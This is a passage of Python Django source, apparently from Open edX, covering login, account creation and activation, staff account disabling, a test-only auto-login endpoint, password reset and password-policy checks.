    # check if the user has a linked shibboleth account, if so, redirect the user to shib-login
    # This behavior is pretty much like what gmail does for shibboleth. Try entering some @stanford.edu
    # address into the Gmail login.
    if settings.FEATURES.get('AUTH_USE_SHIB') and user:
        try:
            eamap = ExternalAuthMap.objects.get(user=user)
            if eamap.external_domain.startswith(external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
                return JsonResponse({
                    "success": False,
                    "redirect": reverse('shib-login'),
                })  # TODO: this should be status code 301  # pylint: disable=fixme
        except ExternalAuthMap.DoesNotExist:
            # This is actually the common case, logging in user without external linked login
            AUDIT_LOG.info(u"User %s w/o external auth attempting login", user)
    # see if account has been locked out due to excessive login failures
    user_found_by_email_lookup = user
    if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
        if LoginFailures.is_user_locked_out(user_found_by_email_lookup):
            lockout_message = _('This account has been temporarily locked due '
                                'to excessive login failures. Try again later.')
            return JsonResponse({
                "success": False,
                "value": lockout_message,
            })  # TODO: this should be status code 429  # pylint: disable=fixme
    # see if the user must reset his/her password due to any policy settings
    if user_found_by_email_lookup and PasswordHistory.should_user_reset_password_now(user_found_by_email_lookup):
        return JsonResponse({
            "success": False,
            "value": _('Your password has expired due to password policy on this account. You must '
                       'reset your password before you can log in again. Please click the '
                       '"Forgot Password" link on this page to reset your password before logging in again.'),
        })  # TODO: this should be status code 403  # pylint: disable=fixme
    # if the user doesn't exist, we want to set the username to an invalid
    # username so that authentication is guaranteed to fail and we can take
    # advantage of the ratelimited backend
    username = user.username if user else ""
    if not third_party_auth_successful:
        try:
            user = authenticate(username=username, password=password, request=request)
        # this occurs when there are too many attempts from the same IP address
        except RateLimitException:
            return JsonResponse({
                "success": False,
                "value": _('Too many failed login attempts. Try again later.'),
            })  # TODO: this should be status code 429  # pylint: disable=fixme
    if user is None:
        # tick the failed login counters if the user exists in the database
        if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
            LoginFailures.increment_lockout_counter(user_found_by_email_lookup)
        # if we didn't find this username earlier, the account for this email
        # doesn't exist, and doesn't have a corresponding password
        if username != "":
            if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
                loggable_id = user_found_by_email_lookup.id if user_found_by_email_lookup else "<unknown>"
                AUDIT_LOG.warning(u"Login failed - password for user.id: {0} is invalid".format(loggable_id))
            else:
                AUDIT_LOG.warning(u"Login failed - password for {0} is invalid".format(email))
        return JsonResponse({
            "success": False,
            "value": _('Email or password is incorrect.'),
        })  # TODO: this should be status code 400  # pylint: disable=fixme
    # successful login, clear failed login attempts counters, if applicable
    if LoginFailures.is_feature_enabled():
        LoginFailures.clear_lockout_counter(user)
    # Track the user's sign in
    if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
        tracking_context = tracker.get_tracker().resolve_context()
        analytics.identify(
            user.id,
            {
                'email': email,
                'username': username
            },
            {
                # Disable MailChimp because we don't want to update the user's email
                # and username in MailChimp on every page load. We only need to capture
                # this data on registration/activation.
                'MailChimp': False
            }
        )
        analytics.track(
            user.id,
            "edx.bi.user.account.authenticated",
            {
                'category': "conversion",
                'label': request.POST.get('course_id'),
                'provider': None
            },
            context={
                'ip': tracking_context.get('ip'),
                'Google Analytics': {
                    'clientId': tracking_context.get('client_id')
                }
            }
        )
    if user is not None and user.is_active:
        try:
            # We do not log here, because we have a handler registered
            # to perform logging on successful logins.
            login(request, user)
            if request.POST.get('remember') == 'true':
                # 604800 seconds == 7 days of "remember me".
                request.session.set_expiry(604800)
                log.debug("Setting user session to never expire")
            else:
                # 0 == expire when the browser closes.
                request.session.set_expiry(0)
        except Exception as exc:  # pylint: disable=broad-except
            AUDIT_LOG.critical("Login failed - Could not create session. Is memcached running?")
            log.critical("Login failed - Could not create session. Is memcached running?")
            log.exception(exc)
            raise
        redirect_url = None  # The AJAX method calling should know the default destination upon success
        if third_party_auth_successful:
            redirect_url = pipeline.get_complete_url(backend_name)
        response = JsonResponse({
            "success": True,
            "redirect_url": redirect_url,
        })
        # Ensure that the external marketing site can
        # detect that the user is logged in.
        return set_logged_in_cookies(request, response, user)
    # Credentials were valid but the account is not activated yet; resend the
    # activation email and report failure.
    if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
        AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
    else:
        AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))
    reactivation_email_for_user(user)
    not_activated_msg = _("Before you sign in, you need to activate your account. We have sent you an "
                          "email message with instructions for activating your account.")
    return JsonResponse({
        "success": False,
        "value": not_activated_msg,
    })  # TODO: this should be status code 400  # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
    """
    Authenticate the client using an OAuth access token by using the token to
    retrieve information from a third party and matching that information to an
    existing user.

    Expects ``access_token`` in the POST body. Responds 204 on success,
    401 for an invalid token, 400 for a malformed request, and 404 when the
    backend is not an OAuth1/OAuth2 backend.
    """
    warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
    backend = request.backend
    # A single isinstance() call with a tuple replaces the redundant
    # `isinstance(...) or isinstance(...)` chain.
    if isinstance(backend, (social_oauth.BaseOAuth1, social_oauth.BaseOAuth2)):
        if "access_token" in request.POST:
            # Tell third party auth pipeline that this is an API call
            request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
            user = None
            try:
                user = backend.do_auth(request.POST["access_token"])
            except (HTTPError, AuthException):
                pass
            # do_auth can return a non-User object if it fails
            if user and isinstance(user, User):
                login(request, user)
                return JsonResponse(status=204)
            else:
                # Ensure user does not re-enter the pipeline
                request.social_strategy.clean_partial_pipeline()
                return JsonResponse({"error": "invalid_token"}, status=401)
        else:
            return JsonResponse({"error": "invalid_request"}, status=400)
    raise Http404
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
    """
    Renders the view used to manage user standing. Also displays a table
    of user accounts that have been disabled and who disabled them.

    Staff-only; raises Http404 for non-staff users.
    """
    if not request.user.is_staff:
        raise Http404
    all_disabled_accounts = UserStanding.objects.filter(
        account_status=UserStanding.ACCOUNT_DISABLED
    )
    # Build the table rows directly from the standings; a comprehension
    # replaces the intermediate list and manual append loop.
    headers = ['username', 'account_changed_by']
    rows = [
        [standing.user.username, standing.user.standing.changed_by]
        for standing in all_disabled_accounts
    ]
    context = {'headers': headers, 'rows': rows}
    return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
    """
    Ajax call to change user standing. Endpoint of the form
    in manage_user_standing.html
    """
    # Staff-only endpoint.
    if not request.user.is_staff:
        raise Http404
    username = request.POST.get('username')
    context = {}
    # Validate inputs with early returns.
    if username is None or username.strip() == '':
        context['message'] = _('Please enter a username')
        return JsonResponse(context, status=400)
    account_action = request.POST.get('account_action')
    if account_action is None:
        context['message'] = _('Please choose an option')
        return JsonResponse(context, status=400)
    username = username.strip()
    try:
        target_user = User.objects.get(username=username)
    except User.DoesNotExist:
        context['message'] = _("User with username {} does not exist").format(username)
        return JsonResponse(context, status=400)
    # Get (or lazily create) the standing record for this user.
    user_account, _created = UserStanding.objects.get_or_create(
        user=target_user, defaults={'changed_by': request.user},
    )
    if account_action == 'disable':
        user_account.account_status = UserStanding.ACCOUNT_DISABLED
        context['message'] = _("Successfully disabled {}'s account").format(username)
        log.info(u"%s disabled %s's account", request.user, username)
    elif account_action == 'reenable':
        user_account.account_status = UserStanding.ACCOUNT_ENABLED
        context['message'] = _("Successfully reenabled {}'s account").format(username)
        log.info(u"%s reenabled %s's account", request.user, username)
    else:
        context['message'] = _("Unexpected account status")
        return JsonResponse(context, status=400)
    # Record who made the change and when, then persist.
    user_account.changed_by = request.user
    user_account.standing_last_changed_at = datetime.datetime.now(UTC)
    user_account.save()
    return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
    """JSON call to change a profile setting: Right now, location"""
    # TODO (vshnayder): location is no longer used
    profile = UserProfile.objects.get(user=request.user)  # request.user.profile_cache
    new_location = request.POST.get('location')
    if new_location is not None:
        profile.location = new_location
        profile.save()
    return JsonResponse({
        "success": True,
        "location": profile.location,
    })
class AccountValidationError(Exception):
    """Signals that account creation failed validation for a single field.

    The offending field name is exposed as ``self.field`` so callers can
    attach the error message to the right form input.
    """

    def __init__(self, message, field):
        self.field = field
        super(AccountValidationError, self).__init__(message)
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs):  # pylint: disable=unused-argument
    """
    handler that saves the user Signup Source
    when the user is created
    """
    # Only act on freshly created users, not updates.
    if not kwargs.get('created'):
        return
    site = configuration_helpers.get_value('SITE_NAME')
    if not site:
        return
    UserSignupSource(user=kwargs['instance'], site=site).save()
    log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form, custom_form=None):
    """
    Given cleaned post variables, create the User and UserProfile objects, as well as the
    registration for this user.

    Returns a tuple (User, UserProfile, Registration).

    Raises ValidationError when either form has errors, and
    AccountValidationError when the username or email is already taken.

    Note: this function is also used for creating test users.
    """
    errors = {}
    errors.update(form.errors)
    if custom_form:
        errors.update(custom_form.errors)
    if errors:
        raise ValidationError(errors)
    user = User(
        username=form.cleaned_data["username"],
        email=form.cleaned_data["email"],
        is_active=False
    )
    user.set_password(form.cleaned_data["password"])
    registration = Registration()
    # TODO: Rearrange so that if part of the process fails, the whole process fails.
    # Right now, we can have e.g. no registration e-mail sent out and a zombie account
    try:
        with transaction.atomic():
            user.save()
            if custom_form:
                custom_model = custom_form.save(commit=False)
                custom_model.user = user
                custom_model.save()
    except IntegrityError:
        # Figure out the cause of the integrity error.
        # Use .exists() instead of len(filter(...)) — it issues a cheap
        # EXISTS query rather than fetching every matching row.
        if User.objects.filter(username=user.username).exists():
            raise AccountValidationError(
                _("An account with the Public Username '{username}' already exists.").format(username=user.username),
                field="username"
            )
        elif User.objects.filter(email=user.email).exists():
            raise AccountValidationError(
                _("An account with the Email '{email}' already exists.").format(email=user.email),
                field="email"
            )
        else:
            raise
    # add this account creation to password history
    # NOTE, this will be a NOP unless the feature has been turned on in configuration
    password_history_entry = PasswordHistory()
    password_history_entry.create(user)
    registration.register(user)
    profile_fields = [
        "name", "level_of_education", "gender", "mailing_address", "city", "country", "goals",
        "year_of_birth"
    ]
    profile = UserProfile(
        user=user,
        **{key: form.cleaned_data.get(key) for key in profile_fields}
    )
    # Extra (non-model) profile fields are serialized into the meta JSON blob.
    extended_profile = form.cleaned_extended_profile
    if extended_profile:
        profile.meta = json.dumps(extended_profile)
    try:
        profile.save()
    except Exception:  # pylint: disable=broad-except
        log.exception("UserProfile creation failed for user {id}.".format(id=user.id))
        raise
    return (user, profile, registration)
def create_account_with_params(request, params):
    """
    Given a request and a dict of parameters (which may or may not have come
    from the request), create an account for the requesting user, including
    creating a comments service user object and sending an activation email.
    This also takes external/third-party auth into account, updates that as
    necessary, and authenticates the user for the request's session.

    Does not return anything.

    Raises AccountValidationError if an account with the username or email
    specified by params already exists, or ValidationError if any of the given
    parameters is invalid for any other reason.

    Issues with this code:
    * It is not transactional. If there is a failure part-way, an incomplete
      account will be created and left in the database.
    * Third-party auth passwords are not verified. There is a comment that
      they are unused, but it would be helpful to have a sanity check that
      they are sane.
    * It is over 300 lines long (!) and includes disprate functionality, from
      registration e-mails to all sorts of other things. It should be broken
      up into semantically meaningful functions.
    * The user-facing text is rather unfriendly (e.g. "Username must be a
      minimum of two characters long" rather than "Please use a username of
      at least two characters").
    """
    # Copy params so we can modify it; we can't just do dict(params) because if
    # params is request.POST, that results in a dict containing lists of values
    params = dict(params.items())
    # allow to define custom set of required/optional/hidden fields via configuration
    extra_fields = configuration_helpers.get_value(
        'REGISTRATION_EXTRA_FIELDS',
        getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
    )
    # Boolean of whether a 3rd party auth provider and credentials were provided in
    # the API so the newly created account can link with the 3rd party account.
    #
    # Note: this is orthogonal to the 3rd party authentication pipeline that occurs
    # when the account is created via the browser and redirect URLs.
    should_link_with_social_auth = third_party_auth.is_enabled() and 'provider' in params
    if should_link_with_social_auth or (third_party_auth.is_enabled() and pipeline.running(request)):
        # Third-party users never authenticate with this password; a random
        # one just satisfies the form's password requirement.
        params["password"] = pipeline.make_random_password()
    # if doing signup for an external authorization, then get email, password, name from the eamap
    # don't use the ones from the form, since the user could have hacked those
    # unless originally we didn't get a valid email or name from the external auth
    # TODO: We do not check whether these values meet all necessary criteria, such as email length
    do_external_auth = 'ExternalAuthMap' in request.session
    if do_external_auth:
        eamap = request.session['ExternalAuthMap']
        try:
            validate_email(eamap.external_email)
            params["email"] = eamap.external_email
        except ValidationError:
            # External email invalid: keep the form-provided email instead.
            pass
        if eamap.external_name.strip() != '':
            params["name"] = eamap.external_name
        params["password"] = eamap.internal_password
        log.debug(u'In create_account with external_auth: user = %s, email=%s', params["name"], params["email"])
    extended_profile_fields = configuration_helpers.get_value('extended_profile_fields', [])
    enforce_password_policy = (
        settings.FEATURES.get("ENFORCE_PASSWORD_POLICY", False) and
        not do_external_auth
    )
    # Can't have terms of service for certain SHIB users, like at Stanford
    registration_fields = getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
    tos_required = (
        registration_fields.get('terms_of_service') != 'hidden' or
        registration_fields.get('honor_code') != 'hidden'
    ) and (
        not settings.FEATURES.get("AUTH_USE_SHIB") or
        not settings.FEATURES.get("SHIB_DISABLE_TOS") or
        not do_external_auth or
        not eamap.external_domain.startswith(
            external_auth.views.SHIBBOLETH_DOMAIN_PREFIX
        )
    )
    form = AccountCreationForm(
        data=params,
        extra_fields=extra_fields,
        extended_profile_fields=extended_profile_fields,
        enforce_username_neq_password=True,
        enforce_password_policy=enforce_password_policy,
        tos_required=tos_required,
    )
    custom_form = get_registration_extension_form(data=params)
    # Perform operations within a transaction that are critical to account creation
    with transaction.atomic():
        # first, create the account
        (user, profile, registration) = _do_create_account(form, custom_form)
        # next, link the account with social auth, if provided via the API.
        # (If the user is using the normal register page, the social auth pipeline does the linking, not this code)
        if should_link_with_social_auth:
            backend_name = params['provider']
            request.social_strategy = social_utils.load_strategy(request)
            redirect_uri = reverse('social:complete', args=(backend_name, ))
            request.backend = social_utils.load_backend(request.social_strategy, backend_name, redirect_uri)
            social_access_token = params.get('access_token')
            if not social_access_token:
                raise ValidationError({
                    'access_token': [
                        _("An access_token is required when passing value ({}) for provider.").format(
                            params['provider']
                        )
                    ]
                })
            request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_REGISTER_API
            pipeline_user = None
            error_message = ""
            try:
                pipeline_user = request.backend.do_auth(social_access_token, user=user)
            except AuthAlreadyAssociated:
                error_message = _("The provided access_token is already associated with another user.")
            except (HTTPError, AuthException):
                error_message = _("The provided access_token is not valid.")
            if not pipeline_user or not isinstance(pipeline_user, User):
                # Ensure user does not re-enter the pipeline
                request.social_strategy.clean_partial_pipeline()
                # Raising inside the atomic block rolls the account back too.
                raise ValidationError({'access_token': [error_message]})
    # Perform operations that are non-critical parts of account creation
    preferences_api.set_user_preference(user, LANGUAGE_KEY, get_language())
    if settings.FEATURES.get('ENABLE_DISCUSSION_EMAIL_DIGEST'):
        try:
            enable_notifications(user)
        except Exception:  # pylint: disable=broad-except
            # Best-effort: notification failure must not block registration.
            log.exception("Enable discussion notifications failed for user {id}.".format(id=user.id))
    dog_stats_api.increment("common.student.account_created")
    # If the user is registering via 3rd party auth, track which provider they use
    third_party_provider = None
    running_pipeline = None
    if third_party_auth.is_enabled() and pipeline.running(request):
        running_pipeline = pipeline.get(request)
        third_party_provider = provider.Registry.get_from_pipeline(running_pipeline)
    # Track the user's registration
    if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
        tracking_context = tracker.get_tracker().resolve_context()
        identity_args = [
            user.id,  # pylint: disable=no-member
            {
                'email': user.email,
                'username': user.username,
                'name': profile.name,
                # Mailchimp requires the age & yearOfBirth to be integers, we send a sane integer default if falsey.
                'age': profile.age or -1,
                'yearOfBirth': profile.year_of_birth or datetime.datetime.now(UTC).year,
                'education': profile.level_of_education_display,
                'address': profile.mailing_address,
                'gender': profile.gender_display,
                'country': unicode(profile.country),
            }
        ]
        if hasattr(settings, 'MAILCHIMP_NEW_USER_LIST_ID'):
            identity_args.append({
                "MailChimp": {
                    "listId": settings.MAILCHIMP_NEW_USER_LIST_ID
                }
            })
        analytics.identify(*identity_args)
        analytics.track(
            user.id,
            "edx.bi.user.account.registered",
            {
                'category': 'conversion',
                'label': params.get('course_id'),
                'provider': third_party_provider.name if third_party_provider else None
            },
            context={
                'ip': tracking_context.get('ip'),
                'Google Analytics': {
                    'clientId': tracking_context.get('client_id')
                }
            }
        )
    # Announce registration
    REGISTER_USER.send(sender=None, user=user, profile=profile)
    create_comments_service_user(user)
    # Don't send email if we are:
    #
    # 1. Doing load testing.
    # 2. Random user generation for other forms of testing.
    # 3. External auth bypassing activation.
    # 4. Have the platform configured to not require e-mail activation.
    # 5. Registering a new user using a trusted third party provider (with skip_email_verification=True)
    #
    # Note that this feature is only tested as a flag set one way or
    # the other for *new* systems. we need to be careful about
    # changing settings on a running system to make sure no users are
    # left in an inconsistent state (or doing a migration if they are).
    send_email = (
        not settings.FEATURES.get('SKIP_EMAIL_VALIDATION', None) and
        not settings.FEATURES.get('AUTOMATIC_AUTH_FOR_TESTING') and
        not (do_external_auth and settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH')) and
        not (
            third_party_provider and third_party_provider.skip_email_verification and
            user.email == running_pipeline['kwargs'].get('details', {}).get('email')
        )
    )
    if send_email:
        context = {
            'name': profile.name,
            'key': registration.activation_key,
        }
        # composes activation email
        subject = render_to_string('emails/activation_email_subject.txt', context)
        # Email subject *must not* contain newlines
        subject = ''.join(subject.splitlines())
        message = render_to_string('emails/activation_email.txt', context)
        from_address = configuration_helpers.get_value(
            'email_from_address',
            settings.DEFAULT_FROM_EMAIL
        )
        send_activation_email.delay(user, subject, message, from_address)
    else:
        # No email needed: activate immediately.
        registration.activate()
        _enroll_user_in_pending_courses(user)  # Enroll student in any pending courses
    # Immediately after a user creates an account, we log them in. They are only
    # logged in until they close the browser. They can't log in again until they click
    # the activation link from the email.
    new_user = authenticate(username=user.username, password=params['password'])
    login(request, new_user)
    request.session.set_expiry(0)
    _record_registration_attribution(request, new_user)
    # TODO: there is no error checking here to see that the user actually logged in successfully,
    # and is not yet an active user.
    if new_user is not None:
        AUDIT_LOG.info(u"Login success on new account creation - {0}".format(new_user.username))
    if do_external_auth:
        eamap.user = new_user
        eamap.dtsignup = datetime.datetime.now(UTC)
        eamap.save()
        AUDIT_LOG.info(u"User registered with external_auth %s", new_user.username)
        AUDIT_LOG.info(u'Updated ExternalAuthMap for %s to be %s', new_user.username, eamap)
        if settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH'):
            log.info('bypassing activation email')
            new_user.is_active = True
            new_user.save()
            AUDIT_LOG.info(u"Login activated on extauth account - {0} ({1})".format(new_user.username, new_user.email))
    # NOTE(review): despite the docstring's "Does not return anything", this
    # function returns the authenticated user — callers (e.g. create_account)
    # rely on that.
    return new_user
def _enroll_user_in_pending_courses(student):
    """
    Enroll student in any pending courses he/she may have.
    """
    for allowed in CourseEnrollmentAllowed.objects.filter(email=student.email):
        if not allowed.auto_enroll:
            continue
        enrollment = CourseEnrollment.enroll(student, allowed.course_id)
        audit = ManualEnrollmentAudit.get_manual_enrollment_by_email(student.email)
        if audit is None:
            continue
        # A prior manual enrollment exists: record a new audit entry for the
        # same email with the ALLOWEDTOENROLL_TO_ENROLLED transition state.
        ManualEnrollmentAudit.create_manual_enrollment_audit(
            audit.enrolled_by, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
            audit.reason, enrollment
        )
def _record_registration_attribution(request, user):
    """
    Attribute this user's registration to the referring affiliate, if
    applicable.
    """
    affiliate_id = request.COOKIES.get(settings.AFFILIATE_COOKIE_NAME)
    # Nothing to record without both a user and an affiliate cookie.
    if user is None or affiliate_id is None:
        return
    UserAttribute.set_user_attribute(user, REGISTRATION_AFFILIATE_ID, affiliate_id)
@csrf_exempt
def create_account(request, post_override=None):
    """
    JSON call to create new edX account.
    Used by form in signup_modal.html, which is included into navigation.html
    """
    warnings.warn("Please use RegistrationView instead.", DeprecationWarning)
    try:
        user = create_account_with_params(request, post_override or request.POST)
    except AccountValidationError as exc:
        # Field-specific failure (duplicate username/email).
        return JsonResponse({'success': False, 'value': exc.message, 'field': exc.field}, status=400)
    except ValidationError as exc:
        # Report only the first failing field from the form errors.
        field, error_list = next(exc.message_dict.iteritems())
        return JsonResponse(
            {
                "success": False,
                "field": field,
                "value": error_list[0],
            },
            status=400
        )
    # The AJAX method calling should know the default destination upon success
    redirect_url = None
    # Resume the third-party-auth pipeline if necessary.
    if third_party_auth.is_enabled() and pipeline.running(request):
        redirect_url = pipeline.get_complete_url(pipeline.get(request)['backend'])
    response = JsonResponse({
        'success': True,
        'redirect_url': redirect_url,
    })
    set_logged_in_cookies(request, response, user)
    return response
def auto_auth(request):
    """
    Create or configure a user account, then log in as that user.

    Enabled only when
    settings.FEATURES['AUTOMATIC_AUTH_FOR_TESTING'] is true.

    Accepts the following querystring parameters:
    * `username`, `email`, and `password` for the user account
    * `full_name` for the user profile (the user's full name; defaults to the username)
    * `staff`: Set to "true" to make the user global staff.
    * `course_id`: Enroll the student in the course with `course_id`
    * `roles`: Comma-separated list of roles to grant the student in the course with `course_id`
    * `no_login`: Define this to create the user but not login
    * `redirect`: Set to "true" will redirect to the `redirect_to` value if set, or
        course home page if course_id is defined, otherwise it will redirect to dashboard
    * `redirect_to`: will redirect to to this url
    If username, email, or password are not provided, use
    randomly generated credentials.
    """
    # Generate a unique name to use if none provided
    unique_name = uuid.uuid4().hex[0:30]
    # Use the params from the request, otherwise use these defaults
    username = request.GET.get('username', unique_name)
    password = request.GET.get('password', unique_name)
    email = request.GET.get('email', unique_name + "@example.com")
    full_name = request.GET.get('full_name', username)
    is_staff = request.GET.get('staff', None)
    is_superuser = request.GET.get('superuser', None)
    course_id = request.GET.get('course_id', None)
    redirect_to = request.GET.get('redirect_to', None)
    # mode has to be one of 'honor'/'professional'/'verified'/'audit'/'no-id-professional'/'credit'
    enrollment_mode = request.GET.get('enrollment_mode', 'honor')
    course_key = None
    if course_id:
        course_key = CourseLocator.from_string(course_id)
    role_names = [v.strip() for v in request.GET.get('roles', '').split(',') if v.strip()]
    redirect_when_done = request.GET.get('redirect', '').lower() == 'true' or redirect_to
    login_when_done = 'no_login' not in request.GET
    form = AccountCreationForm(
        data={
            'username': username,
            'email': email,
            'password': password,
            'name': full_name,
        },
        tos_required=False
    )
    # Attempt to create the account.
    # If successful, this will return a tuple containing
    # the new user object.
    try:
        user, profile, reg = _do_create_account(form)
    except (AccountValidationError, ValidationError):
        # Attempt to retrieve the existing user.
        # Overwrite email/password so the requested credentials always work.
        user = User.objects.get(username=username)
        user.email = email
        user.set_password(password)
        user.save()
        profile = UserProfile.objects.get(user=user)
        reg = Registration.objects.get(user=user)
    # Set the user's global staff bit
    if is_staff is not None:
        user.is_staff = (is_staff == "true")
        user.save()
    if is_superuser is not None:
        user.is_superuser = (is_superuser == "true")
        user.save()
    # Activate the user
    reg.activate()
    reg.save()
    # ensure parental consent threshold is met
    year = datetime.date.today().year
    age_limit = settings.PARENTAL_CONSENT_AGE_LIMIT
    profile.year_of_birth = (year - age_limit) - 1
    profile.save()
    # Enroll the user in a course
    if course_key is not None:
        CourseEnrollment.enroll(user, course_key, mode=enrollment_mode)
    # Apply the roles
    for role_name in role_names:
        role = Role.objects.get(name=role_name, course_id=course_key)
        user.roles.add(role)
    # Log in as the user
    if login_when_done:
        user = authenticate(username=username, password=password)
        login(request, user)
    create_comments_service_user(user)
    # Provide the user with a valid CSRF token
    # then return a 200 response unless redirect is true
    if redirect_when_done:
        # Redirect to specific page if specified
        if redirect_to:
            redirect_url = redirect_to
        # Redirect to course info page if course_id is known
        elif course_id:
            try:
                # redirect to course info page in LMS
                redirect_url = reverse(
                    'info',
                    kwargs={'course_id': course_id}
                )
            except NoReverseMatch:
                # redirect to course outline page in Studio
                redirect_url = reverse(
                    'course_handler',
                    kwargs={'course_key_string': course_id}
                )
        else:
            try:
                # redirect to dashboard for LMS
                redirect_url = reverse('dashboard')
            except NoReverseMatch:
                # redirect to home for Studio
                redirect_url = reverse('home')
        return redirect(redirect_url)
    elif request.META.get('HTTP_ACCEPT') == 'application/json':
        response = JsonResponse({
            'created_status': u"Logged in" if login_when_done else "Created",
            'username': username,
            'email': email,
            'password': password,
            'user_id': user.id,  # pylint: disable=no-member
            'anonymous_id': anonymous_id_for_user(user, None),
        })
    else:
        success_msg = u"{} user {} ({}) with password {} and user_id {}".format(
            u"Logged in" if login_when_done else "Created",
            username, email, password, user.id  # pylint: disable=no-member
        )
        response = HttpResponse(success_msg)
    response.set_cookie('csrftoken', csrf(request)['csrf_token'])
    return response
@ensure_csrf_cookie
def activate_account(request, key):
    """When link in activation e-mail is clicked.

    Looks up the Registration row for ``key``. On a unique match the user
    is activated (if not already) and any pending course enrollments are
    applied; zero matches render the "invalid key" page; any other match
    count falls through to a 500 response.
    """
    regs = Registration.objects.filter(activation_key=key)
    if len(regs) == 1:
        user_logged_in = request.user.is_authenticated()
        already_active = True
        if not regs[0].user.is_active:
            regs[0].activate()
            already_active = False

            # Enroll student in any pending courses he/she may have if auto_enroll flag is set
            _enroll_user_in_pending_courses(regs[0].user)

        resp = render_to_response(
            "registration/activation_complete.html",
            {
                'user_logged_in': user_logged_in,
                'already_active': already_active
            }
        )
        return resp
    if len(regs) == 0:
        return render_to_response(
            "registration/activation_invalid.html",
            {'csrf': csrf(request)['csrf_token']}
        )
    return HttpResponseServerError(_("Unknown error. Please e-mail us to let us know how it happened."))
@csrf_exempt
@require_POST
def password_reset(request):
    """ Attempts to send a password reset e-mail. """
    # Add some rate limiting here by re-using the RateLimitMixin as a helper class
    limiter = BadRequestRateLimiter()
    if limiter.is_rate_limit_exceeded(request):
        AUDIT_LOG.warning("Rate limit exceeded in password_reset")
        return HttpResponseForbidden()

    form = PasswordResetFormNoActive(request.POST)
    if form.is_valid():
        form.save(use_https=request.is_secure(),
                  from_email=configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL),
                  request=request,
                  domain_override=request.get_host())
        # When password change is complete, a "edx.user.settings.changed" event will be emitted.
        # But because changing the password is multi-step, we also emit an event here so that we can
        # track where the request was initiated.
        tracker.emit(
            SETTING_CHANGE_INITIATED,
            {
                "setting": "password",
                "old": None,
                "new": None,
                "user_id": request.user.id,
            }
        )
    else:
        # bad user? tick the rate limiter counter
        AUDIT_LOG.info("Bad password_reset user passed in.")
        limiter.tick_bad_request_counter(request)
    # 'success' is True even when the form was invalid, so this endpoint
    # does not reveal whether an account exists for the submitted address.
    return JsonResponse({
        'success': True,
        'value': render_to_string('registration/password_reset_done.html', {}),
    })
def uidb36_to_uidb64(uidb36):
    """
    Needed to support old password reset URLs that use base36-encoded user IDs
    https://github.com/django/django/commit/1184d077893ff1bc947e45b00a4d565f3df81776#diff-c571286052438b2e3190f8db8331a92bR231

    Args:
        uidb36: base36-encoded user ID

    Returns: base64-encoded user ID. Otherwise returns a dummy, invalid ID
    """
    try:
        return force_text(urlsafe_base64_encode(force_bytes(base36_to_int(uidb36))))
    except ValueError:
        # '1' has incorrect padding for base64, so downstream decoding
        # treats it as an invalid ID
        return '1'
def validate_password(user, password):
    """
    Tie in password policy enforcement as an optional level of
    security protection

    Args:
        user: the user object whose password we're checking.
        password: the user's proposed new password.

    Returns:
        is_valid_password: a boolean indicating if the new password
            passes the validation.
        err_msg: an error message if there's a violation of one of the password
            checks. Otherwise, `None`.

    Note: the three checks below run unconditionally in sequence and each
    overwrites ``err_msg``, so when several fail only the last failing
    check's message is reported.
    """
    err_msg = None

    if settings.FEATURES.get('ENFORCE_PASSWORD_POLICY', False):
        try:
            validate_password_strength(password)
        except ValidationError as err:
            err_msg = _('Password: ') + '; '.join(err.messages)

    # also, check the password reuse policy
    if not PasswordHistory.is_allowable_password_reuse(user, password):
        # staff and students have separate reuse thresholds
        if user.is_staff:
            num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STAFF_PASSWORDS_BEFORE_REUSE']
        else:
            num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STUDENT_PASSWORDS_BEFORE_REUSE']
        # Because of how ngettext is, splitting the following into shorter lines would be ugly.
        # pylint: disable=line-too-long
        err_msg = ungettext(
            "You are re-using a password that you have used recently. You must have {num} distinct password before reusing a previous password.",
            "You are re-using a password that you have used recently. You must have {num} distinct passwords before reusing a previous password.",
            num_distinct
        ).format(num=num_distinct)

    # also, check to see if passwords are getting reset too frequent
    if PasswordHistory.is_password_reset_too_soon(user):
        num_days = settings.ADVANCED_SECURITY_CONFIG['MIN_TIME_IN_DAYS_BETWEEN_ALLOWED_RESETS']
        # Because of how ngettext is, splitting the following into shorter lines would be ugly.
        # pylint: disable=line-too-long
        err_msg = ungettext(
            "You are resetting passwords too frequently. Due to security policies, {num} day must elapse between password resets.",
            "You are resetting passwords too frequently. Due to security policies, {num} days must elapse between password resets.",
            num_days
        ).format(num=num_days)

    is_password_valid = err_msg is None

    return is_password_valid, err_msg
def password_reset_confirm_wrapper(request, uidb36=None, token=None):
    """
    A wrapper around django.contrib.auth.views.password_reset_confirm.
    Needed because we want to set the user as active at this step.
    We also optionally do some additional password policy checks.
    """
    # convert old-style base36-encoded user id to base64
